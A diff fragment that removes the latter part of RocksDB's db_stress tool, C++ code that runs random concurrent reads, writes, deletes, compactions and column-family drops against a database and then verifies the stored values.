-    }
-
-    db_->ReleaseSnapshot(snapshot);
-
-    return s;
-  }
-
-  Status SetOptions(ThreadState* thread) {
-    assert(FLAGS_set_options_one_in > 0);
-    std::unordered_map<std::string, std::string> opts;
-    std::string name = options_index_[
-      thread->rand.Next() % options_index_.size()];
-    int value_idx = thread->rand.Next() % options_table_[name].size();
-    if (name == "soft_rate_limit" || name == "hard_rate_limit") {
-      opts["soft_rate_limit"] = options_table_["soft_rate_limit"][value_idx];
-      opts["hard_rate_limit"] = options_table_["hard_rate_limit"][value_idx];
-    } else if (name == "level0_file_num_compaction_trigger" ||
-               name == "level0_slowdown_writes_trigger" ||
-               name == "level0_stop_writes_trigger") {
-      opts["level0_file_num_compaction_trigger"] =
-        options_table_["level0_file_num_compaction_trigger"][value_idx];
-      opts["level0_slowdown_writes_trigger"] =
-        options_table_["level0_slowdown_writes_trigger"][value_idx];
-      opts["level0_stop_writes_trigger"] =
-        options_table_["level0_stop_writes_trigger"][value_idx];
-    } else {
-      opts[name] = options_table_[name][value_idx];
-    }
-
-    int rand_cf_idx = thread->rand.Next() % FLAGS_column_families;
-    auto cfh = column_families_[rand_cf_idx];
-    return db_->SetOptions(cfh, opts);
-  }
-
-  void OperateDb(ThreadState* thread) {
-    ReadOptions read_opts(FLAGS_verify_checksum, true);
-    WriteOptions write_opts;
-    auto shared = thread->shared;
-    char value[100];
-    auto max_key = thread->shared->GetMaxKey();
-    std::string from_db;
-    if (FLAGS_sync) {
-      write_opts.sync = true;
-    }
-    write_opts.disableWAL = FLAGS_disable_wal;
-    const int prefixBound = (int)FLAGS_readpercent + (int)FLAGS_prefixpercent;
-    const int writeBound = prefixBound + (int)FLAGS_writepercent;
-    const int delBound = writeBound + (int)FLAGS_delpercent;
-    const int delRangeBound = delBound + (int)FLAGS_delrangepercent;
-
-    thread->stats.Start();
-    for (uint64_t i = 0; i < FLAGS_ops_per_thread; i++) {
-      if (thread->shared->HasVerificationFailedYet()) {
-        break;
-      }
-      if (i != 0 && (i % (FLAGS_ops_per_thread / (FLAGS_reopen + 1))) == 0) {
-        {
-          thread->stats.FinishedSingleOp();
-          MutexLock l(thread->shared->GetMutex());
-          thread->shared->IncVotedReopen();
-          if (thread->shared->AllVotedReopen()) {
-            thread->shared->GetStressTest()->Reopen();
-            thread->shared->GetCondVar()->SignalAll();
-          }
-          else {
-            thread->shared->GetCondVar()->Wait();
-          }
-          // Commenting this out as we don't want to reset stats on each open.
-          // thread->stats.Start();
-        }
-      }
-
-      // Change Options
-      if (FLAGS_set_options_one_in > 0 &&
-          thread->rand.OneIn(FLAGS_set_options_one_in)) {
-        SetOptions(thread);
-      }
-
-      if (FLAGS_set_in_place_one_in > 0 &&
-          thread->rand.OneIn(FLAGS_set_in_place_one_in)) {
-        options_.inplace_update_support ^= options_.inplace_update_support;
-      }
-
-      if (!FLAGS_test_batches_snapshots &&
-          FLAGS_clear_column_family_one_in != 0 && FLAGS_column_families > 1) {
-        if (thread->rand.OneIn(FLAGS_clear_column_family_one_in)) {
-          // drop column family and then create it again (can't drop default)
-          int cf = thread->rand.Next() % (FLAGS_column_families - 1) + 1;
-          std::string new_name =
-              ToString(new_column_family_name_.fetch_add(1));
-          {
-            MutexLock l(thread->shared->GetMutex());
-            fprintf(
-                stdout,
-                "[CF %d] Dropping and recreating column family. new name: %s\n",
-                cf, new_name.c_str());
-          }
-          thread->shared->LockColumnFamily(cf);
-          Status s __attribute__((unused));
-          s = db_->DropColumnFamily(column_families_[cf]);
-          delete column_families_[cf];
-          if (!s.ok()) {
-            fprintf(stderr, "dropping column family error: %s\n",
-                s.ToString().c_str());
-            std::terminate();
-          }
-          s = db_->CreateColumnFamily(ColumnFamilyOptions(options_), new_name,
-                                      &column_families_[cf]);
-          column_family_names_[cf] = new_name;
-          thread->shared->ClearColumnFamily(cf);
-          if (!s.ok()) {
-            fprintf(stderr, "creating column family error: %s\n",
-                s.ToString().c_str());
-            std::terminate();
-          }
-          thread->shared->UnlockColumnFamily(cf);
-        }
-      }
-
-#ifndef ROCKSDB_LITE  // Lite does not support GetColumnFamilyMetaData
-      if (FLAGS_compact_files_one_in > 0 &&
-          thread->rand.Uniform(FLAGS_compact_files_one_in) == 0) {
-        auto* random_cf =
-            column_families_[thread->rand.Next() % FLAGS_column_families];
-        rocksdb::ColumnFamilyMetaData cf_meta_data;
-        db_->GetColumnFamilyMetaData(random_cf, &cf_meta_data);
-
-        // Randomly compact up to three consecutive files from a level
-        const int kMaxRetry = 3;
-        for (int attempt = 0; attempt < kMaxRetry; ++attempt) {
-          size_t random_level = thread->rand.Uniform(
-              static_cast<int>(cf_meta_data.levels.size()));
-
-          const auto& files = cf_meta_data.levels[random_level].files;
-          if (files.size() > 0) {
-            size_t random_file_index =
-                thread->rand.Uniform(static_cast<int>(files.size()));
-            if (files[random_file_index].being_compacted) {
-              // Retry as the selected file is currently being compacted
-              continue;
-            }
-
-            std::vector<std::string> input_files;
-            input_files.push_back(files[random_file_index].name);
-            if (random_file_index > 0 &&
-                !files[random_file_index - 1].being_compacted) {
-              input_files.push_back(files[random_file_index - 1].name);
-            }
-            if (random_file_index + 1 < files.size() &&
-                !files[random_file_index + 1].being_compacted) {
-              input_files.push_back(files[random_file_index + 1].name);
-            }
-
-            size_t output_level =
-                std::min(random_level + 1, cf_meta_data.levels.size() - 1);
-            auto s =
-                db_->CompactFiles(CompactionOptions(), random_cf, input_files,
-                                  static_cast<int>(output_level));
-            if (!s.ok()) {
-              printf("Unable to perform CompactFiles(): %s\n",
-                     s.ToString().c_str());
-              thread->stats.AddNumCompactFilesFailed(1);
-            } else {
-              thread->stats.AddNumCompactFilesSucceed(1);
-            }
-            break;
-          }
-        }
-      }
-#endif                // !ROCKSDB_LITE
-
-      const double completed_ratio =
-          static_cast<double>(i) / FLAGS_ops_per_thread;
-      const int64_t base_key = static_cast<int64_t>(
-          completed_ratio * (FLAGS_max_key - FLAGS_active_width));
-      long rand_key = base_key + thread->rand.Next() % FLAGS_active_width;
-      int rand_column_family = thread->rand.Next() % FLAGS_column_families;
-      std::string keystr = Key(rand_key);
-      Slice key = keystr;
-      std::unique_ptr<MutexLock> l;
-      if (!FLAGS_test_batches_snapshots) {
-        l.reset(new MutexLock(
-            shared->GetMutexForKey(rand_column_family, rand_key)));
-      }
-      auto column_family = column_families_[rand_column_family];
-
-      int prob_op = thread->rand.Uniform(100);
-      if (prob_op >= 0 && prob_op < (int)FLAGS_readpercent) {
-        // OPERATION read
-        if (!FLAGS_test_batches_snapshots) {
-          Status s = db_->Get(read_opts, column_family, key, &from_db);
-          if (s.ok()) {
-            // found case
-            thread->stats.AddGets(1, 1);
-          } else if (s.IsNotFound()) {
-            // not found case
-            thread->stats.AddGets(1, 0);
-          } else {
-            // errors case
-            thread->stats.AddErrors(1);
-          }
-        } else {
-          MultiGet(thread, read_opts, column_family, key, &from_db);
-        }
-      } else if ((int)FLAGS_readpercent <= prob_op && prob_op < prefixBound) {
-        // OPERATION prefix scan
-        // keys are 8 bytes long, prefix size is FLAGS_prefix_size. There are
-        // (8 - FLAGS_prefix_size) bytes besides the prefix. So there will
-        // be 2 ^ ((8 - FLAGS_prefix_size) * 8) possible keys with the same
-        // prefix
-        if (!FLAGS_test_batches_snapshots) {
-          Slice prefix = Slice(key.data(), FLAGS_prefix_size);
-          Iterator* iter = db_->NewIterator(read_opts, column_family);
-          int64_t count = 0;
-          for (iter->Seek(prefix);
-               iter->Valid() && iter->key().starts_with(prefix); iter->Next()) {
-            ++count;
-          }
-          assert(count <=
-                 (static_cast<int64_t>(1) << ((8 - FLAGS_prefix_size) * 8)));
-          if (iter->status().ok()) {
-            thread->stats.AddPrefixes(1, static_cast<int>(count));
-          } else {
-            thread->stats.AddErrors(1);
-          }
-          delete iter;
-        } else {
-          MultiPrefixScan(thread, read_opts, column_family, key);
-        }
-      } else if (prefixBound <= prob_op && prob_op < writeBound) {
-        // OPERATION write
-        uint32_t value_base = thread->rand.Next();
-        size_t sz = GenerateValue(value_base, value, sizeof(value));
-        Slice v(value, sz);
-        if (!FLAGS_test_batches_snapshots) {
-          // If the chosen key does not allow overwrite and it already
-          // exists, choose another key.
-          while (!shared->AllowsOverwrite(rand_column_family, rand_key) &&
-                 shared->Exists(rand_column_family, rand_key)) {
-            l.reset();
-            rand_key = thread->rand.Next() % max_key;
-            rand_column_family = thread->rand.Next() % FLAGS_column_families;
-            l.reset(new MutexLock(
-                shared->GetMutexForKey(rand_column_family, rand_key)));
-          }
-
-          keystr = Key(rand_key);
-          key = keystr;
-          column_family = column_families_[rand_column_family];
-
-          if (FLAGS_verify_before_write) {
-            std::string keystr2 = Key(rand_key);
-            Slice k = keystr2;
-            Status s = db_->Get(read_opts, column_family, k, &from_db);
-            if (!VerifyValue(rand_column_family, rand_key, read_opts,
-                             thread->shared, from_db, s, true)) {
-              break;
-            }
-          }
-          shared->Put(rand_column_family, rand_key, value_base);
-          Status s;
-          if (FLAGS_use_merge) {
-            s = db_->Merge(write_opts, column_family, key, v);
-          } else {
-            s = db_->Put(write_opts, column_family, key, v);
-          }
-          if (!s.ok()) {
-            fprintf(stderr, "put or merge error: %s\n", s.ToString().c_str());
-            std::terminate();
-          }
-          thread->stats.AddBytesForWrites(1, sz);
-        } else {
-          MultiPut(thread, write_opts, column_family, key, v, sz);
-        }
-        PrintKeyValue(rand_column_family, static_cast<uint32_t>(rand_key),
-                      value, sz);
-      } else if (writeBound <= prob_op && prob_op < delBound) {
-        // OPERATION delete
-        if (!FLAGS_test_batches_snapshots) {
-          // If the chosen key does not allow overwrite and it does not exist,
-          // choose another key.
-          while (!shared->AllowsOverwrite(rand_column_family, rand_key) &&
-                 !shared->Exists(rand_column_family, rand_key)) {
-            l.reset();
-            rand_key = thread->rand.Next() % max_key;
-            rand_column_family = thread->rand.Next() % FLAGS_column_families;
-            l.reset(new MutexLock(
-                shared->GetMutexForKey(rand_column_family, rand_key)));
-          }
-
-          keystr = Key(rand_key);
-          key = keystr;
-          column_family = column_families_[rand_column_family];
-
-          // Use delete if the key may be overwritten and a single deletion
-          // otherwise.
-          if (shared->AllowsOverwrite(rand_column_family, rand_key)) {
-            shared->Delete(rand_column_family, rand_key);
-            Status s = db_->Delete(write_opts, column_family, key);
-            thread->stats.AddDeletes(1);
-            if (!s.ok()) {
-              fprintf(stderr, "delete error: %s\n", s.ToString().c_str());
-              std::terminate();
-            }
-          } else {
-            shared->SingleDelete(rand_column_family, rand_key);
-            Status s = db_->SingleDelete(write_opts, column_family, key);
-            thread->stats.AddSingleDeletes(1);
-            if (!s.ok()) {
-              fprintf(stderr, "single delete error: %s\n",
-                      s.ToString().c_str());
-              std::terminate();
-            }
-          }
-        } else {
-          MultiDelete(thread, write_opts, column_family, key);
-        }
-      } else if (delBound <= prob_op && prob_op < delRangeBound) {
-        // OPERATION delete range
-        if (!FLAGS_test_batches_snapshots) {
-          std::vector<std::unique_ptr<MutexLock>> range_locks;
-          // delete range does not respect disallowed overwrites. the keys for
-          // which overwrites are disallowed are randomly distributed so it
-          // could be expensive to find a range where each key allows
-          // overwrites.
-          if (rand_key > max_key - FLAGS_range_deletion_width) {
-            l.reset();
-            rand_key = thread->rand.Next() %
-                       (max_key - FLAGS_range_deletion_width + 1);
-            range_locks.emplace_back(new MutexLock(
-                shared->GetMutexForKey(rand_column_family, rand_key)));
-          } else {
-            range_locks.emplace_back(std::move(l));
-          }
-          for (int j = 1; j < FLAGS_range_deletion_width; ++j) {
-            if (((rand_key + j) & ((1 << FLAGS_log2_keys_per_lock) - 1)) == 0) {
-              range_locks.emplace_back(new MutexLock(
-                    shared->GetMutexForKey(rand_column_family, rand_key + j)));
-            }
-          }
-
-          keystr = Key(rand_key);
-          key = keystr;
-          column_family = column_families_[rand_column_family];
-          std::string end_keystr = Key(rand_key + FLAGS_range_deletion_width);
-          Slice end_key = end_keystr;
-          int covered = shared->DeleteRange(
-              rand_column_family, rand_key,
-              rand_key + FLAGS_range_deletion_width);
-          Status s = db_->DeleteRange(write_opts, column_family, key, end_key);
-          if (!s.ok()) {
-            fprintf(stderr, "delete range error: %s\n",
-                    s.ToString().c_str());
-            std::terminate();
-          }
-          thread->stats.AddRangeDeletions(1);
-          thread->stats.AddCoveredByRangeDeletions(covered);
-        }
-      } else {
-        // OPERATION iterate
-        MultiIterate(thread, read_opts, column_family, key);
-      }
-      thread->stats.FinishedSingleOp();
-    }
-
-    thread->stats.Stop();
-  }
-
-  void VerifyDb(ThreadState* thread) const {
-    ReadOptions options(FLAGS_verify_checksum, true);
-    auto shared = thread->shared;
-    const int64_t max_key = shared->GetMaxKey();
-    const int64_t keys_per_thread = max_key / shared->GetNumThreads();
-    int64_t start = keys_per_thread * thread->tid;
-    int64_t end = start + keys_per_thread;
-    if (thread->tid == shared->GetNumThreads() - 1) {
-      end = max_key;
-    }
-    for (size_t cf = 0; cf < column_families_.size(); ++cf) {
-      if (thread->shared->HasVerificationFailedYet()) {
-        break;
-      }
-      if (!thread->rand.OneIn(2)) {
-        // Use iterator to verify this range
-        unique_ptr<Iterator> iter(
-            db_->NewIterator(options, column_families_[cf]));
-        iter->Seek(Key(start));
-        for (auto i = start; i < end; i++) {
-          if (thread->shared->HasVerificationFailedYet()) {
-            break;
-          }
-          // TODO(ljin): update "long" to uint64_t
-          // Reseek when the prefix changes
-          if (i % (static_cast<int64_t>(1) << 8 * (8 - FLAGS_prefix_size)) ==
-              0) {
-            iter->Seek(Key(i));
-          }
-          std::string from_db;
-          std::string keystr = Key(i);
-          Slice k = keystr;
-          Status s = iter->status();
-          if (iter->Valid()) {
-            if (iter->key().compare(k) > 0) {
-              s = Status::NotFound(Slice());
-            } else if (iter->key().compare(k) == 0) {
-              from_db = iter->value().ToString();
-              iter->Next();
-            } else if (iter->key().compare(k) < 0) {
-              VerificationAbort(shared, "An out of range key was found",
-                                static_cast<int>(cf), i);
-            }
-          } else {
-            // The iterator found no value for the key in question, so do not
-            // move to the next item in the iterator
-            s = Status::NotFound(Slice());
-          }
-          VerifyValue(static_cast<int>(cf), i, options, shared, from_db, s,
-                      true);
-          if (from_db.length()) {
-            PrintKeyValue(static_cast<int>(cf), static_cast<uint32_t>(i),
-                          from_db.data(), from_db.length());
-          }
-        }
-      } else {
-        // Use Get to verify this range
-        for (auto i = start; i < end; i++) {
-          if (thread->shared->HasVerificationFailedYet()) {
-            break;
-          }
-          std::string from_db;
-          std::string keystr = Key(i);
-          Slice k = keystr;
-          Status s = db_->Get(options, column_families_[cf], k, &from_db);
-          VerifyValue(static_cast<int>(cf), i, options, shared, from_db, s,
-                      true);
-          if (from_db.length()) {
-            PrintKeyValue(static_cast<int>(cf), static_cast<uint32_t>(i),
-                          from_db.data(), from_db.length());
-          }
-        }
-      }
-    }
-  }
-
-  void VerificationAbort(SharedState* shared, std::string msg, int cf,
-                         int64_t key) const {
-    printf("Verification failed for column family %d key %" PRIi64 ": %s\n", cf, key,
-           msg.c_str());
-    shared->SetVerificationFailure();
-  }
-
-  bool VerifyValue(int cf, int64_t key, const ReadOptions& opts,
-                   SharedState* shared, const std::string& value_from_db,
-                   Status s, bool strict = false) const {
-    if (shared->HasVerificationFailedYet()) {
-      return false;
-    }
-    // compare value_from_db with the value in the shared state
-    char value[kValueMaxLen];
-    uint32_t value_base = shared->Get(cf, key);
-    if (value_base == SharedState::SENTINEL && !strict) {
-      return true;
-    }
-
-    if (s.ok()) {
-      if (value_base == SharedState::SENTINEL) {
-        VerificationAbort(shared, "Unexpected value found", cf, key);
-        return false;
-      }
-      size_t sz = GenerateValue(value_base, value, sizeof(value));
-      if (value_from_db.length() != sz) {
-        VerificationAbort(shared, "Length of value read is not equal", cf, key);
-        return false;
-      }
-      if (memcmp(value_from_db.data(), value, sz) != 0) {
-        VerificationAbort(shared, "Contents of value read don't match", cf,
-                          key);
-        return false;
-      }
-    } else {
-      if (value_base != SharedState::SENTINEL) {
-        VerificationAbort(shared, "Value not found: " + s.ToString(), cf, key);
-        return false;
-      }
-    }
-    return true;
-  }
-
-  static void PrintKeyValue(int cf, int64_t key, const char* value,
-                            size_t sz) {
-    if (!FLAGS_verbose) {
-      return;
-    }
-    fprintf(stdout, "[CF %d] %" PRIi64 " == > (%" ROCKSDB_PRIszt ") ", cf, key, sz);
-    for (size_t i = 0; i < sz; i++) {
-      fprintf(stdout, "%X", value[i]);
-    }
-    fprintf(stdout, "\n");
-  }
-
-  static size_t GenerateValue(uint32_t rand, char *v, size_t max_sz) {
-    size_t value_sz =
-        ((rand % kRandomValueMaxFactor) + 1) * FLAGS_value_size_mult;
-    assert(value_sz <= max_sz && value_sz >= sizeof(uint32_t));
-    *((uint32_t*)v) = rand;
-    for (size_t i=sizeof(uint32_t); i < value_sz; i++) {
-      v[i] = (char)(rand ^ i);
-    }
-    v[value_sz] = '\0';
-    return value_sz; // the size of the value set.
-  }
-
-  void PrintEnv() const {
-    fprintf(stdout, "RocksDB version           : %d.%d\n", kMajorVersion,
-            kMinorVersion);
-    fprintf(stdout, "Column families           : %d\n", FLAGS_column_families);
-    if (!FLAGS_test_batches_snapshots) {
-      fprintf(stdout, "Clear CFs one in          : %d\n",
-              FLAGS_clear_column_family_one_in);
-    }
-    fprintf(stdout, "Number of threads         : %d\n", FLAGS_threads);
-    fprintf(stdout, "Ops per thread            : %lu\n",
-            (unsigned long)FLAGS_ops_per_thread);
-    std::string ttl_state("unused");
-    if (FLAGS_ttl > 0) {
-      ttl_state = NumberToString(FLAGS_ttl);
-    }
-    fprintf(stdout, "Time to live(sec)         : %s\n", ttl_state.c_str());
-    fprintf(stdout, "Read percentage           : %d%%\n", FLAGS_readpercent);
-    fprintf(stdout, "Prefix percentage         : %d%%\n", FLAGS_prefixpercent);
-    fprintf(stdout, "Write percentage          : %d%%\n", FLAGS_writepercent);
-    fprintf(stdout, "Delete percentage         : %d%%\n", FLAGS_delpercent);
-    fprintf(stdout, "Delete range percentage   : %d%%\n", FLAGS_delrangepercent);
-    fprintf(stdout, "No overwrite percentage   : %d%%\n",
-            FLAGS_nooverwritepercent);
-    fprintf(stdout, "Iterate percentage        : %d%%\n", FLAGS_iterpercent);
-    fprintf(stdout, "DB-write-buffer-size      : %" PRIu64 "\n",
-            FLAGS_db_write_buffer_size);
-    fprintf(stdout, "Write-buffer-size         : %d\n",
-            FLAGS_write_buffer_size);
-    fprintf(stdout, "Iterations                : %lu\n",
-            (unsigned long)FLAGS_num_iterations);
-    fprintf(stdout, "Max key                   : %lu\n",
-            (unsigned long)FLAGS_max_key);
-    fprintf(stdout, "Ratio #ops/#keys          : %f\n",
-            (1.0 * FLAGS_ops_per_thread * FLAGS_threads) / FLAGS_max_key);
-    fprintf(stdout, "Num times DB reopens      : %d\n", FLAGS_reopen);
-    fprintf(stdout, "Batches/snapshots         : %d\n",
-            FLAGS_test_batches_snapshots);
-    fprintf(stdout, "Do update in place        : %d\n", FLAGS_in_place_update);
-    fprintf(stdout, "Num keys per lock         : %d\n",
-            1 << FLAGS_log2_keys_per_lock);
-    std::string compression = CompressionTypeToString(FLAGS_compression_type_e);
-    fprintf(stdout, "Compression               : %s\n", compression.c_str());
-    std::string checksum = ChecksumTypeToString(FLAGS_checksum_type_e);
-    fprintf(stdout, "Checksum type             : %s\n", checksum.c_str());
-    fprintf(stdout, "Max subcompactions        : %" PRIu64 "\n",
-            FLAGS_subcompactions);
-
-    const char* memtablerep = "";
-    switch (FLAGS_rep_factory) {
-      case kSkipList:
-        memtablerep = "skip_list";
-        break;
-      case kHashSkipList:
-        memtablerep = "prefix_hash";
-        break;
-      case kVectorRep:
-        memtablerep = "vector";
-        break;
-    }
-
-    fprintf(stdout, "Memtablerep               : %s\n", memtablerep);
-
-    fprintf(stdout, "Test kill odd             : %d\n", rocksdb_kill_odds);
-    if (!rocksdb_kill_prefix_blacklist.empty()) {
-      fprintf(stdout, "Skipping kill points prefixes:\n");
-      for (auto& p : rocksdb_kill_prefix_blacklist) {
-        fprintf(stdout, "  %s\n", p.c_str());
-      }
-    }
-
-    fprintf(stdout, "------------------------------------------------\n");
-  }
-
-  void Open() {
-    assert(db_ == nullptr);
-    BlockBasedTableOptions block_based_options;
-    block_based_options.block_cache = cache_;
-    block_based_options.block_cache_compressed = compressed_cache_;
-    block_based_options.checksum = FLAGS_checksum_type_e;
-    block_based_options.block_size = FLAGS_block_size;
-    block_based_options.format_version = 2;
-    block_based_options.filter_policy = filter_policy_;
-    options_.table_factory.reset(
-        NewBlockBasedTableFactory(block_based_options));
-    options_.db_write_buffer_size = FLAGS_db_write_buffer_size;
-    options_.write_buffer_size = FLAGS_write_buffer_size;
-    options_.max_write_buffer_number = FLAGS_max_write_buffer_number;
-    options_.min_write_buffer_number_to_merge =
-        FLAGS_min_write_buffer_number_to_merge;
-    options_.max_write_buffer_number_to_maintain =
-        FLAGS_max_write_buffer_number_to_maintain;
-    options_.memtable_prefix_bloom_size_ratio =
-        FLAGS_memtable_prefix_bloom_size_ratio;
-    options_.max_background_compactions = FLAGS_max_background_compactions;
-    options_.max_background_flushes = FLAGS_max_background_flushes;
-    options_.compaction_style =
-        static_cast<rocksdb::CompactionStyle>(FLAGS_compaction_style);
-    options_.prefix_extractor.reset(NewFixedPrefixTransform(FLAGS_prefix_size));
-    options_.max_open_files = FLAGS_open_files;
-    options_.statistics = dbstats;
-    options_.env = FLAGS_env;
-    options_.use_fsync = FLAGS_use_fsync;
-    options_.compaction_readahead_size = FLAGS_compaction_readahead_size;
-    options_.allow_mmap_reads = FLAGS_mmap_read;
-    options_.allow_mmap_writes = FLAGS_mmap_write;
-    options_.use_direct_reads = FLAGS_use_direct_reads;
-    options_.use_direct_io_for_flush_and_compaction =
-        FLAGS_use_direct_io_for_flush_and_compaction;
-    options_.target_file_size_base = FLAGS_target_file_size_base;
-    options_.target_file_size_multiplier = FLAGS_target_file_size_multiplier;
-    options_.max_bytes_for_level_base = FLAGS_max_bytes_for_level_base;
-    options_.max_bytes_for_level_multiplier =
-        FLAGS_max_bytes_for_level_multiplier;
-    options_.level0_stop_writes_trigger = FLAGS_level0_stop_writes_trigger;
-    options_.level0_slowdown_writes_trigger =
-        FLAGS_level0_slowdown_writes_trigger;
-    options_.level0_file_num_compaction_trigger =
-        FLAGS_level0_file_num_compaction_trigger;
-    options_.compression = FLAGS_compression_type_e;
-    options_.create_if_missing = true;
-    options_.max_manifest_file_size = 10 * 1024;
-    options_.inplace_update_support = FLAGS_in_place_update;
-    options_.max_subcompactions = static_cast<uint32_t>(FLAGS_subcompactions);
-    options_.allow_concurrent_memtable_write =
-        FLAGS_allow_concurrent_memtable_write;
-    options_.enable_write_thread_adaptive_yield =
-        FLAGS_enable_write_thread_adaptive_yield;
-    if (FLAGS_rate_limiter_bytes_per_sec > 0) {
-      options_.rate_limiter.reset(NewGenericRateLimiter(
-          FLAGS_rate_limiter_bytes_per_sec, 1000 /* refill_period_us */,
-          10 /* fairness */,
-          FLAGS_rate_limit_bg_reads ? RateLimiter::Mode::kReadsOnly
-                                    : RateLimiter::Mode::kWritesOnly));
-      if (FLAGS_rate_limit_bg_reads) {
-        options_.new_table_reader_for_compaction_inputs = true;
-      }
-    }
-
-    if (FLAGS_prefix_size == 0 && FLAGS_rep_factory == kHashSkipList) {
-      fprintf(stderr,
-              "prefeix_size cannot be zero if memtablerep == prefix_hash\n");
-      exit(1);
-    }
-    if (FLAGS_prefix_size != 0 && FLAGS_rep_factory != kHashSkipList) {
-      fprintf(stderr,
-              "WARNING: prefix_size is non-zero but "
-              "memtablerep != prefix_hash\n");
-    }
-    switch (FLAGS_rep_factory) {
-      case kSkipList:
-        // no need to do anything
-        break;
-#ifndef ROCKSDB_LITE
-      case kHashSkipList:
-        options_.memtable_factory.reset(NewHashSkipListRepFactory(10000));
-        break;
-      case kVectorRep:
-        options_.memtable_factory.reset(new VectorRepFactory());
-        break;
-#else
-      default:
-        fprintf(stderr,
-                "RocksdbLite only supports skip list mem table. Skip "
-                "--rep_factory\n");
-#endif  // ROCKSDB_LITE
-    }
-
-    if (FLAGS_use_full_merge_v1) {
-      options_.merge_operator = MergeOperators::CreateDeprecatedPutOperator();
-    } else {
-      options_.merge_operator = MergeOperators::CreatePutOperator();
-    }
-
-    // set universal style compaction configurations, if applicable
-    if (FLAGS_universal_size_ratio != 0) {
-      options_.compaction_options_universal.size_ratio =
-          FLAGS_universal_size_ratio;
-    }
-    if (FLAGS_universal_min_merge_width != 0) {
-      options_.compaction_options_universal.min_merge_width =
-          FLAGS_universal_min_merge_width;
-    }
-    if (FLAGS_universal_max_merge_width != 0) {
-      options_.compaction_options_universal.max_merge_width =
-          FLAGS_universal_max_merge_width;
-    }
-    if (FLAGS_universal_max_size_amplification_percent != 0) {
-      options_.compaction_options_universal.max_size_amplification_percent =
-          FLAGS_universal_max_size_amplification_percent;
-    }
-
-    fprintf(stdout, "DB path: [%s]\n", FLAGS_db.c_str());
-
-    Status s;
-    if (FLAGS_ttl == -1) {
-      std::vector<std::string> existing_column_families;
-      s = DB::ListColumnFamilies(DBOptions(options_), FLAGS_db,
-                                 &existing_column_families);  // ignore errors
-      if (!s.ok()) {
-        // DB doesn't exist
-        assert(existing_column_families.empty());
-        assert(column_family_names_.empty());
-        column_family_names_.push_back(kDefaultColumnFamilyName);
-      } else if (column_family_names_.empty()) {
-        // this is the first call to the function Open()
-        column_family_names_ = existing_column_families;
-      } else {
-        // this is a reopen. just assert that existing column_family_names are
-        // equivalent to what we remember
-        auto sorted_cfn = column_family_names_;
-        std::sort(sorted_cfn.begin(), sorted_cfn.end());
-        std::sort(existing_column_families.begin(),
-                  existing_column_families.end());
-        if (sorted_cfn != existing_column_families) {
-          fprintf(stderr,
-                  "Expected column families differ from the existing:\n");
-          printf("Expected: {");
-          for (auto cf : sorted_cfn) {
-            printf("%s ", cf.c_str());
-          }
-          printf("}\n");
-          printf("Existing: {");
-          for (auto cf : existing_column_families) {
-            printf("%s ", cf.c_str());
-          }
-          printf("}\n");
-        }
-        assert(sorted_cfn == existing_column_families);
-      }
-      std::vector<ColumnFamilyDescriptor> cf_descriptors;
-      for (auto name : column_family_names_) {
-        if (name != kDefaultColumnFamilyName) {
-          new_column_family_name_ =
-              std::max(new_column_family_name_.load(), std::stoi(name) + 1);
-        }
-        cf_descriptors.emplace_back(name, ColumnFamilyOptions(options_));
-      }
-      while (cf_descriptors.size() < (size_t)FLAGS_column_families) {
-        std::string name = ToString(new_column_family_name_.load());
-        new_column_family_name_++;
-        cf_descriptors.emplace_back(name, ColumnFamilyOptions(options_));
-        column_family_names_.push_back(name);
-      }
-      options_.listeners.clear();
-      options_.listeners.emplace_back(
-          new DbStressListener(FLAGS_db, options_.db_paths));
-      options_.create_missing_column_families = true;
-      s = DB::Open(DBOptions(options_), FLAGS_db, cf_descriptors,
-                   &column_families_, &db_);
-      assert(!s.ok() || column_families_.size() ==
-                            static_cast<size_t>(FLAGS_column_families));
-    } else {
-#ifndef ROCKSDB_LITE
-      DBWithTTL* db_with_ttl;
-      s = DBWithTTL::Open(options_, FLAGS_db, &db_with_ttl, FLAGS_ttl);
-      db_ = db_with_ttl;
-#else
-      fprintf(stderr, "TTL is not supported in RocksDBLite\n");
-      exit(1);
-#endif
-    }
-    if (!s.ok()) {
-      fprintf(stderr, "open error: %s\n", s.ToString().c_str());
-      exit(1);
-    }
-  }
-
-  void Reopen() {
-    for (auto cf : column_families_) {
-      delete cf;
-    }
-    column_families_.clear();
-    delete db_;
-    db_ = nullptr;
-
-    num_times_reopened_++;
-    auto now = FLAGS_env->NowMicros();
-    fprintf(stdout, "%s Reopening database for the %dth time\n",
-            FLAGS_env->TimeToString(now/1000000).c_str(),
-            num_times_reopened_);
-    Open();
-  }
-
-  void PrintStatistics() {
-    if (dbstats) {
-      fprintf(stdout, "STATISTICS:\n%s\n", dbstats->ToString().c_str());
-    }
-  }
-
- private:
-  std::shared_ptr<Cache> cache_;
-  std::shared_ptr<Cache> compressed_cache_;
-  std::shared_ptr<const FilterPolicy> filter_policy_;
-  DB* db_;
-  Options options_;
-  std::vector<ColumnFamilyHandle*> column_families_;
-  std::vector<std::string> column_family_names_;
-  std::atomic<int> new_column_family_name_;
-  int num_times_reopened_;
-  std::unordered_map<std::string, std::vector<std::string>> options_table_;
-  std::vector<std::string> options_index_;
-};
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  SetUsageMessage(std::string("\nUSAGE:\n") + std::string(argv[0]) +
-                  " [OPTIONS]...");
-  ParseCommandLineFlags(&argc, &argv, true);
-#if !defined(NDEBUG) && !defined(OS_MACOSX) && !defined(OS_WIN) && \
-  !defined(OS_SOLARIS) && !defined(OS_AIX)
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-    "NewWritableFile:O_DIRECT", [&](void* arg) {
-      int* val = static_cast<int*>(arg);
-      *val &= ~O_DIRECT;
-    });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-    "NewRandomAccessFile:O_DIRECT", [&](void* arg) {
-      int* val = static_cast<int*>(arg);
-      *val &= ~O_DIRECT;
-    });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-#endif
-
-  if (FLAGS_statistics) {
-    dbstats = rocksdb::CreateDBStatistics();
-  }
-  FLAGS_compression_type_e =
-    StringToCompressionType(FLAGS_compression_type.c_str());
-  FLAGS_checksum_type_e = StringToChecksumType(FLAGS_checksum_type.c_str());
-  if (!FLAGS_hdfs.empty()) {
-    FLAGS_env  = new rocksdb::HdfsEnv(FLAGS_hdfs);
-  }
-  FLAGS_rep_factory = StringToRepFactory(FLAGS_memtablerep.c_str());
-
-  // The number of background threads should be at least as much the
-  // max number of concurrent compactions.
-  FLAGS_env->SetBackgroundThreads(FLAGS_max_background_compactions);
